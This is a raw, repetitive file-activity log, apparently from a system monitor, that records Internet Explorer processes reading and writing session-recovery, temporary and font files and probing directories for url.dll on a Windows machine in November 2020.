11/3/2020 - 11:45:56.559Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF87016B4E61313843.TMP~DF87016B4E61313843.TMP
11/3/2020 - 11:45:56.559Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat{5426E1AA-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\url.dll
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\url.dll
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\url.dll
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\url.dll
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\url.dll
11/3/2020 - 11:45:56.559Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\url.dll
11/3/2020 - 11:45:56.575Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeui.ttf
11/3/2020 - 11:45:56.575Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\Fonts\segoeuib.ttf
11/3/2020 - 11:46:1.481Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:46:1.481Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
11/3/2020 - 11:46:1.481Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF43F2811F3DAD271C.TMP~DF43F2811F3DAD271C.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.datRecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.481Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.481Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.715Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.715Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.715Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.715Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
